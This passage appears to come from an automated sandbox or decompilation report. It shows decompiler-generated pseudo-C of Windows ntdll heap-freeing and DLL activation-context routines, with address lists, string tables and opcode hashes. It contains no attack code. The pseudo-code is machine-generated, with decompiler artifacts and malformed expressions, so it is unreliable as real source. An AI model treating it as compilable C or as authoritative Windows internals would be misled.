                                                                                                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                          						}
                                                                                                                          						E00A81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				_t82 = E009E7D50();
                                                                                                                          				_t125 = 0x7ffe038a;
                                                                                                                          				if(_t82 != 0) {
                                                                                                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          				} else {
                                                                                                                          					_t85 = 0x7ffe038a;
                                                                                                                          				}
                                                                                                                          				if( *_t85 != 0) {
                                                                                                                          					__eflags = E009E7D50();
                                                                                                                          					if(__eflags != 0) {
                                                                                                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                                          					}
                                                                                                                          					E00A81582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                                                                                          				_t91 =  *(_t103 + 2);
                                                                                                                          				if((_t91 & 0x00000004) != 0) {
                                                                                                                          					E00A1D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                                                                                          					_t91 =  *(_t103 + 2);
                                                                                                                          				}
                                                                                                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                                                                                                          				_t65 = 1;
                                                                                                                          				goto L13;
                                                                                                                          			}
                                                                                                                          0x009ea279
                                                                                                                          0x009ea27e
                                                                                                                          0x009ea282
                                                                                                                          0x00a31db5
                                                                                                                          0x00a31dbb
                                                                                                                          0x00a31dc1
                                                                                                                          0x00a31dc5
                                                                                                                          0x00a31de4
                                                                                                                          0x00a31de9
                                                                                                                          0x00a31dc7
                                                                                                                          0x00a31ddc
                                                                                                                          0x00a31de1
                                                                                                                          0x00a31def
                                                                                                                          0x00a31df3
                                                                                                                          0x00a31df7
                                                                                                                          0x00a31dfe
                                                                                                                          0x00a31e06
                                                                                                                          0x009ea302
                                                                                                                          0x009ea308
                                                                                                                          0x009ea308
                                                                                                                          0x009ea288
                                                                                                                          0x009ea28d
                                                                                                                          0x009ea294
                                                                                                                          0x00a31cc1
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29a
                                                                                                                          0x009ea29f
                                                                                                                          0x00a31ccb
                                                                                                                          0x00a31cd1
                                                                                                                          0x00a31cd8
                                                                                                                          0x00a31cea
                                                                                                                          0x00a31cea
                                                                                                                          0x00a31cd8
                                                                                                                          0x009ea2a9
                                                                                                                          0x009ea2af
                                                                                                                          0x009ea2bc
                                                                                                                          0x00a31cfd
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c2
                                                                                                                          0x009ea2c7
                                                                                                                          0x00a31d07
                                                                                                                          0x00a31d0d
                                                                                                                          0x00a31d14
                                                                                                                          0x00a31d1f
                                                                                                                          0x00a31d21
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d2c
                                                                                                                          0x00a31d47
                                                                                                                          0x00a31d47
                                                                                                                          0x00a31d14
                                                                                                                          0x009ea2cd
                                                                                                                          0x009ea2d2
                                                                                                                          0x009ea2d9
                                                                                                                          0x00a31d5a
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2df
                                                                                                                          0x009ea2e4
                                                                                                                          0x00a31d69
                                                                                                                          0x00a31d6b
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d76
                                                                                                                          0x00a31d91
                                                                                                                          0x00a31d91
                                                                                                                          0x009ea2ea
                                                                                                                          0x009ea2f0
                                                                                                                          0x009ea2f5
                                                                                                                          0x00a31da8
                                                                                                                          0x00a31dad
                                                                                                                          0x00a31dad
                                                                                                                          0x009ea2fd
                                                                                                                          0x009ea300
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                          • API String ID: 2994545307-2586055223
                                                                                                                          • Opcode ID: de3441dc214781d7e2107a6780d3cc01f38a22a653bbfa9a333d49a48bc6a00d
                                                                                                                          • Instruction ID: a7c51b08578b5bbe1fb0450c07dc5c591f03a80d21d1bb340b908311a29a4095
                                                                                                                          • Opcode Fuzzy Hash: de3441dc214781d7e2107a6780d3cc01f38a22a653bbfa9a333d49a48bc6a00d
                                                                                                                          • Instruction Fuzzy Hash: 525103322056809FD722DB69CC45F67B7E8FF81B50F180868F5659B2A2D734EC40CB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E009F8E00(void* __ecx) {
                                                                                                                          				signed int _v8;
                                                                                                                          				char _v12;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				intOrPtr* _t32;
                                                                                                                          				intOrPtr _t35;
                                                                                                                          				intOrPtr _t43;
                                                                                                                          				void* _t46;
                                                                                                                          				intOrPtr _t47;
                                                                                                                          				void* _t48;
                                                                                                                          				signed int _t49;
                                                                                                                          				void* _t50;
                                                                                                                          				intOrPtr* _t51;
                                                                                                                          				signed int _t52;
                                                                                                                          				void* _t53;
                                                                                                                          				intOrPtr _t55;
                                                                                                                          
                                                                                                                          				_v8 =  *0xabd360 ^ _t52;
                                                                                                                          				_t49 = 0;
                                                                                                                          				_t48 = __ecx;
                                                                                                                          				_t55 =  *0xab8464; // 0x74790110
                                                                                                                          				if(_t55 == 0) {
                                                                                                                          					L9:
                                                                                                                          					if( !_t49 >= 0) {
                                                                                                                          						if(( *0xab5780 & 0x00000003) != 0) {
                                                                                                                          							E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                                                                                          						}
                                                                                                                          						if(( *0xab5780 & 0x00000010) != 0) {
                                                                                                                          							asm("int3");
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return E00A0B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                                                                                          				}
                                                                                                                          				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                                                                                          				_t43 =  *0xab7984; // 0x442c18
                                                                                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                                                                                          					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                                                                                          					if(_t48 == _t43) {
                                                                                                                          						_t50 = 0x5c;
                                                                                                                          						if( *_t32 == _t50) {
                                                                                                                          							_t46 = 0x3f;
                                                                                                                          							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                                                                                          								_t32 = _t32 + 8;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t51 =  *0xab8464; // 0x74790110
                                                                                                                          					 *0xabb1e0(_t47, _t32,  &_v12);
                                                                                                                          					_t49 =  *_t51();
                                                                                                                          					if(_t49 >= 0) {
                                                                                                                          						L8:
                                                                                                                          						_t35 = _v12;
                                                                                                                          						if(_t35 != 0) {
                                                                                                                          							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                                                                                          								E009F9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                                                                                          								_t35 = _v12;
                                                                                                                          							}
                                                                                                                          							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                                                                                          						}
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					if(_t49 != 0xc000008a) {
                                                                                                                          						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                                                                                          							if(_t49 != 0xc00000bb) {
                                                                                                                          								goto L8;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(( *0xab5780 & 0x00000005) != 0) {
                                                                                                                          						_push(_t49);
                                                                                                                          						E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                                                                                          						_t53 = _t53 + 0x1c;
                                                                                                                          					}
                                                                                                                          					_t49 = 0;
                                                                                                                          					goto L8;
                                                                                                                          				} else {
                                                                                                                          					goto L9;
                                                                                                                          				}
                                                                                                                          			}




















                                                                                                                          0x00a39345
                                                                                                                          0x00a39345
                                                                                                                          0x009f8e76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A3932A
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 00A39331, 00A3935D
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 00A39357
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A3933B, 00A39367
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 0-3779518884
                                                                                                                          • Opcode ID: dace684233ef980ebb2de44e8a5f660aa7bd204011067faf05e881b77eaf308c
                                                                                                                          • Instruction ID: 249f88a7ca2075d8959aa4ab5c24f8c94638f741df32ae99c22dee4f01ab55b3
                                                                                                                          • Opcode Fuzzy Hash: dace684233ef980ebb2de44e8a5f660aa7bd204011067faf05e881b77eaf308c
                                                                                                                          • Instruction Fuzzy Hash: 7741F632E0031D9FDBA5BB589C4DA7BB6A8AB51348F194569EA18571A1EFB05C8083C1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                          • API String ID: 2994545307-336120773
                                                                                                                          • Opcode ID: 278bc354e03ba717d9ab04d049e05d395612c58db68ec6050baa0f3a743322d8
                                                                                                                          • Instruction ID: 872eb543459abb6e57ac2931fcaa8d5cde5cac6f74b635e7691c42d8537b9727
                                                                                                                          • Opcode Fuzzy Hash: 278bc354e03ba717d9ab04d049e05d395612c58db68ec6050baa0f3a743322d8
                                                                                                                          • Instruction Fuzzy Hash: 87312631684215EFC714FB58C886F67B3A8EF497A4F184059F4069F2A2D770AC44C7A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E009E99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                                                                                          				char _v5;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed short _v20;
                                                                                                                          				void* __ebx;
                                                                                                                          				void* __edi;
                                                                                                                          				void* __esi;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed short _t186;
                                                                                                                          				intOrPtr _t187;
                                                                                                                          				signed short _t190;
                                                                                                                          				signed int _t196;
                                                                                                                          				signed short _t197;
                                                                                                                          				intOrPtr _t203;
                                                                                                                          				signed int _t207;
                                                                                                                          				signed int _t210;
                                                                                                                          				signed short _t215;
                                                                                                                          				intOrPtr _t216;
                                                                                                                          				signed short _t219;
                                                                                                                          				signed int _t221;
                                                                                                                          				signed short _t222;
                                                                                                                          				intOrPtr _t228;
                                                                                                                          				signed int _t232;
                                                                                                                          				signed int _t235;
                                                                                                                          				signed int _t250;
                                                                                                                          				signed short _t251;
                                                                                                                          				intOrPtr _t252;
                                                                                                                          				signed short _t254;
                                                                                                                          				intOrPtr _t255;
                                                                                                                          				signed int _t258;
                                                                                                                          				signed int _t259;
                                                                                                                          				signed short _t262;
                                                                                                                          				intOrPtr _t271;
                                                                                                                          				signed int _t279;
                                                                                                                          				signed int _t282;
                                                                                                                          				signed int _t284;
                                                                                                                          				signed int _t286;
                                                                                                                          				intOrPtr _t292;
                                                                                                                          				signed int _t296;
                                                                                                                          				signed int _t299;
                                                                                                                          				signed int _t307;
                                                                                                                          				signed int* _t309;
                                                                                                                          				signed short* _t311;
                                                                                                                          				signed short* _t313;
                                                                                                                          				signed char _t314;
                                                                                                                          				intOrPtr _t316;
                                                                                                                          				signed int _t323;
                                                                                                                          				signed char _t328;
                                                                                                                          				signed short* _t330;
                                                                                                                          				signed char _t331;
                                                                                                                          				intOrPtr _t335;
                                                                                                                          				signed int _t342;
                                                                                                                          				signed char _t347;
                                                                                                                          				signed short* _t348;
                                                                                                                          				signed short* _t350;
                                                                                                                          				signed short _t352;
                                                                                                                          				signed char _t354;
                                                                                                                          				intOrPtr _t357;
                                                                                                                          				intOrPtr* _t364;
                                                                                                                          				signed char _t365;
                                                                                                                          				intOrPtr _t366;
                                                                                                                          				signed int _t373;
                                                                                                                          				signed char _t378;
                                                                                                                          				signed int* _t381;
                                                                                                                          				signed int _t382;
                                                                                                                          				signed short _t384;
                                                                                                                          				signed int _t386;
                                                                                                                          				unsigned int _t390;
                                                                                                                          				signed int _t393;
                                                                                                                          				signed int* _t394;
                                                                                                                          				unsigned int _t398;
                                                                                                                          				signed short _t400;
                                                                                                                          				signed short _t402;
                                                                                                                          				signed int _t404;
                                                                                                                          				signed int _t407;
                                                                                                                          				unsigned int _t411;
                                                                                                                          				signed short* _t414;
                                                                                                                          				signed int _t415;
                                                                                                                          				signed short* _t419;
                                                                                                                          				signed int* _t420;
                                                                                                                          				void* _t421;
                                                                                                                          
                                                                                                                          				_t414 = __edx;
                                                                                                                          				_t307 = __ecx;
                                                                                                                          				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                                                                                          				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                                                                                          					_v5 = _a8;
                                                                                                                          					L3:
                                                                                                                          					_t381 = _a4;
                                                                                                                          					goto L4;
                                                                                                                          				} else {
                                                                                                                          					__eflags =  *(__ecx + 0x4c);
                                                                                                                          					if( *(__ecx + 0x4c) != 0) {
                                                                                                                          						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                                                                                          						 *_t419 = _t411;
                                                                                                                          						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                                                                                          						__eflags = _t411 >> 0x18 - _t378;
                                                                                                                          						if(__eflags != 0) {
                                                                                                                          							_push(_t378);
                                                                                                                          							E00A7FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					_t250 = _a8;
                                                                                                                          					_v5 = _t250;
                                                                                                                          					__eflags = _t250;
                                                                                                                          					if(_t250 != 0) {
                                                                                                                          						_t400 = _t414[6];
                                                                                                                          						_t53 =  &(_t414[4]); // -16
                                                                                                                          						_t348 = _t53;
                                                                                                                          						_t251 =  *_t348;
                                                                                                                          						_v12 = _t251;
                                                                                                                          						_v16 = _t400;
                                                                                                                          						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                                                                                          						__eflags =  *_t400 - _t252;
                                                                                                                          						if( *_t400 != _t252) {
                                                                                                                          							L49:
                                                                                                                          							_push(_t348);
                                                                                                                          							_push( *_t400);
                                                                                                                          							E00A8A80D(_t307, 0xd, _t348, _t252);
                                                                                                                          							L50:
                                                                                                                          							_v5 = 0;
                                                                                                                          							goto L11;
                                                                                                                          						}
                                                                                                                          						__eflags =  *_t400 - _t348;
                                                                                                                          						if( *_t400 != _t348) {
                                                                                                                          							goto L49;
                                                                                                                          						}
                                                                                                                          						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                                                                          						_t407 =  *(_t307 + 0xb4);
                                                                                                                          						__eflags = _t407;
                                                                                                                          						if(_t407 == 0) {
                                                                                                                          							L36:
                                                                                                                          							_t364 = _v16;
                                                                                                                          							_t282 = _v12;
                                                                                                                          							 *_t364 = _t282;
                                                                                                                          							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                                                                                          							__eflags = _t414[1] & 0x00000008;
                                                                                                                          							if((_t414[1] & 0x00000008) == 0) {
                                                                                                                          								L39:
                                                                                                                          								_t365 = _t414[1];
                                                                                                                          								__eflags = _t365 & 0x00000004;
                                                                                                                          								if((_t365 & 0x00000004) != 0) {
                                                                                                                          									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                                                                          									_v12 = _t284;
                                                                                                                          									__eflags = _t365 & 0x00000002;
                                                                                                                          									if((_t365 & 0x00000002) != 0) {
                                                                                                                          										__eflags = _t284 - 4;
                                                                                                                          										if(_t284 > 4) {
                                                                                                                          											_t284 = _t284 - 4;
                                                                                                                          											__eflags = _t284;
                                                                                                                          											_v12 = _t284;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          									_t78 =  &(_t414[8]); // -8
                                                                                                                          									_t286 = E00A1D540(_t78, _t284, 0xfeeefeee);
                                                                                                                          									_v16 = _t286;
                                                                                                                          									__eflags = _t286 - _v12;
                                                                                                                          									if(_t286 != _v12) {
                                                                                                                          										_t366 =  *[fs:0x30];
                                                                                                                          										__eflags =  *(_t366 + 0xc);
                                                                                                                          										if( *(_t366 + 0xc) == 0) {
                                                                                                                          											_push("HEAP: ");
                                                                                                                          											E009CB150();
                                                                                                                          										} else {
                                                                                                                          											E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          										}
                                                                                                                          										_push(_v16 + 0x10 + _t414);
                                                                                                                          										E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                                                                          										_t292 =  *[fs:0x30];
                                                                                                                          										_t421 = _t421 + 0xc;
                                                                                                                          										__eflags =  *((char*)(_t292 + 2));
                                                                                                                          										if( *((char*)(_t292 + 2)) != 0) {
                                                                                                                          											 *0xab6378 = 1;
                                                                                                                          											asm("int3");
                                                                                                                          											 *0xab6378 = 0;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L50;
                                                                                                                          							}
                                                                                                                          							_t296 = E009EA229(_t307, _t414);
                                                                                                                          							__eflags = _t296;
                                                                                                                          							if(_t296 != 0) {
                                                                                                                          								goto L39;
                                                                                                                          							} else {
                                                                                                                          								E009EA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                                                                          								goto L50;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t373 =  *_t414 & 0x0000ffff;
                                                                                                                          							while(1) {
                                                                                                                          								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                                                                                          								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                                                                                          									_t301 = _t373;
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								_t299 =  *_t407;
                                                                                                                          								__eflags = _t299;
                                                                                                                          								if(_t299 == 0) {
                                                                                                                          									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                                          									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                                                                                          									break;
                                                                                                                          								} else {
                                                                                                                          									_t407 = _t299;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t62 =  &(_t414[4]); // -16
                                                                                                                          							E009EBC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                                                                                          							goto L36;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L11:
                                                                                                                          					_t402 = _t419[6];
                                                                                                                          					_t25 =  &(_t419[4]); // -16
                                                                                                                          					_t350 = _t25;
                                                                                                                          					_t254 =  *_t350;
                                                                                                                          					_v12 = _t254;
                                                                                                                          					_v20 = _t402;
                                                                                                                          					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                                                                                          					__eflags =  *_t402 - _t255;
                                                                                                                          					if( *_t402 != _t255) {
                                                                                                                          						L61:
                                                                                                                          						_push(_t350);
                                                                                                                          						_push( *_t402);
                                                                                                                          						E00A8A80D(_t307, 0xd, _t350, _t255);
                                                                                                                          						goto L3;
                                                                                                                          					}
                                                                                                                          					__eflags =  *_t402 - _t350;
                                                                                                                          					if( *_t402 != _t350) {
                                                                                                                          						goto L61;
                                                                                                                          					}
                                                                                                                          					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                                                                                          					_t404 =  *(_t307 + 0xb4);
                                                                                                                          					__eflags = _t404;
                                                                                                                          					if(_t404 == 0) {
                                                                                                                          						L20:
                                                                                                                          						_t352 = _v20;
                                                                                                                          						_t258 = _v12;
                                                                                                                          						 *_t352 = _t258;
                                                                                                                          						 *(_t258 + 4) = _t352;
                                                                                                                          						__eflags = _t419[1] & 0x00000008;
                                                                                                                          						if((_t419[1] & 0x00000008) != 0) {
                                                                                                                          							_t259 = E009EA229(_t307, _t419);
                                                                                                                          							__eflags = _t259;
                                                                                                                          							if(_t259 != 0) {
                                                                                                                          								goto L21;
                                                                                                                          							} else {
                                                                                                                          								E009EA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                                                                                          								goto L3;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L21:
                                                                                                                          						_t354 = _t419[1];
                                                                                                                          						__eflags = _t354 & 0x00000004;
                                                                                                                          						if((_t354 & 0x00000004) != 0) {
                                                                                                                          							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                                                                                          							__eflags = _t354 & 0x00000002;
                                                                                                                          							if((_t354 & 0x00000002) != 0) {
                                                                                                                          								__eflags = _t415 - 4;
                                                                                                                          								if(_t415 > 4) {
                                                                                                                          									_t415 = _t415 - 4;
                                                                                                                          									__eflags = _t415;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							_t91 =  &(_t419[8]); // -8
                                                                                                                          							_t262 = E00A1D540(_t91, _t415, 0xfeeefeee);
                                                                                                                          							_v20 = _t262;
                                                                                                                          							__eflags = _t262 - _t415;
                                                                                                                          							if(_t262 != _t415) {
                                                                                                                          								_t357 =  *[fs:0x30];
                                                                                                                          								__eflags =  *(_t357 + 0xc);
                                                                                                                          								if( *(_t357 + 0xc) == 0) {
                                                                                                                          									_push("HEAP: ");
                                                                                                                          									E009CB150();
                                                                                                                          								} else {
                                                                                                                          									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          								}
                                                                                                                          								_push(_v20 + 0x10 + _t419);
                                                                                                                          								E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                                                                                          								_t271 =  *[fs:0x30];
                                                                                                                          								_t421 = _t421 + 0xc;
                                                                                                                          								__eflags =  *((char*)(_t271 + 2));
                                                                                                                          								if( *((char*)(_t271 + 2)) != 0) {
                                                                                                                          									 *0xab6378 = 1;
                                                                                                                          									asm("int3");
                                                                                                                          									 *0xab6378 = 0;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t381 = _a4;
                                                                                                                          						_t414 = _t419;
                                                                                                                          						_t419[1] = 0;
                                                                                                                          						_t419[3] = 0;
                                                                                                                          						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
                                                                                                                          						 *_t419 =  *_t381;
                                                                                                                          						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
                                                                                                                          						L4:
                                                                                                                          						_t420 = _t414 +  *_t381 * 8;
                                                                                                                          						if( *(_t307 + 0x4c) == 0) {
                                                                                                                          							L6:
                                                                                                                          							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
                                                                                                                          								__eflags =  *(_t307 + 0x4c);
                                                                                                                          								if( *(_t307 + 0x4c) != 0) {
                                                                                                                          									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                                                                          									 *_t420 = _t390;
                                                                                                                          									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                                                                          									__eflags = _t390 >> 0x18 - _t328;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_push(_t328);
                                                                                                                          										E00A7FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__eflags = _v5;
                                                                                                                          								if(_v5 == 0) {
                                                                                                                          									L94:
                                                                                                                          									_t382 = _t420[3];
                                                                                                                          									_t137 =  &(_t420[2]); // -16
                                                                                                                          									_t309 = _t137;
                                                                                                                          									_t186 =  *_t309;
                                                                                                                          									_v20 = _t186;
                                                                                                                          									_v16 = _t382;
                                                                                                                          									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                                                                          									__eflags =  *_t382 - _t187;
                                                                                                                          									if( *_t382 != _t187) {
                                                                                                                          										L63:
                                                                                                                          										_push(_t309);
                                                                                                                          										_push( *_t382);
                                                                                                                          										_push(_t187);
                                                                                                                          										_push(_t309);
                                                                                                                          										_push(0xd);
                                                                                                                          										L64:
                                                                                                                          										E00A8A80D(_t307);
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									__eflags =  *_t382 - _t309;
                                                                                                                          									if( *_t382 != _t309) {
                                                                                                                          										goto L63;
                                                                                                                          									}
                                                                                                                          									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                                                                          									_t393 =  *(_t307 + 0xb4);
                                                                                                                          									__eflags = _t393;
                                                                                                                          									if(_t393 == 0) {
                                                                                                                          										L104:
                                                                                                                          										_t330 = _v16;
                                                                                                                          										_t190 = _v20;
                                                                                                                          										 *_t330 = _t190;
                                                                                                                          										 *(_t190 + 4) = _t330;
                                                                                                                          										__eflags = _t420[0] & 0x00000008;
                                                                                                                          										if((_t420[0] & 0x00000008) == 0) {
                                                                                                                          											L107:
                                                                                                                          											_t331 = _t420[0];
                                                                                                                          											__eflags = _t331 & 0x00000004;
                                                                                                                          											if((_t331 & 0x00000004) != 0) {
                                                                                                                          												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                                                                          												_v12 = _t196;
                                                                                                                          												__eflags = _t331 & 0x00000002;
                                                                                                                          												if((_t331 & 0x00000002) != 0) {
                                                                                                                          													__eflags = _t196 - 4;
                                                                                                                          													if(_t196 > 4) {
                                                                                                                          														_t196 = _t196 - 4;
                                                                                                                          														__eflags = _t196;
                                                                                                                          														_v12 = _t196;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												_t162 =  &(_t420[4]); // -8
                                                                                                                          												_t197 = E00A1D540(_t162, _t196, 0xfeeefeee);
                                                                                                                          												_v20 = _t197;
                                                                                                                          												__eflags = _t197 - _v12;
                                                                                                                          												if(_t197 != _v12) {
                                                                                                                          													_t335 =  *[fs:0x30];
                                                                                                                          													__eflags =  *(_t335 + 0xc);
                                                                                                                          													if( *(_t335 + 0xc) == 0) {
                                                                                                                          														_push("HEAP: ");
                                                                                                                          														E009CB150();
                                                                                                                          													} else {
                                                                                                                          														E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                          													}
                                                                                                                          													_push(_v20 + 0x10 + _t420);
                                                                                                                          													E009CB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                                                                          													_t203 =  *[fs:0x30];
                                                                                                                          													__eflags =  *((char*)(_t203 + 2));
                                                                                                                          													if( *((char*)(_t203 + 2)) != 0) {
                                                                                                                          														 *0xab6378 = 1;
                                                                                                                          														asm("int3");
                                                                                                                          														 *0xab6378 = 0;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											_t394 = _a4;
                                                                                                                          											_t414[1] = 0;
                                                                                                                          											_t414[3] = 0;
                                                                                                                          											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
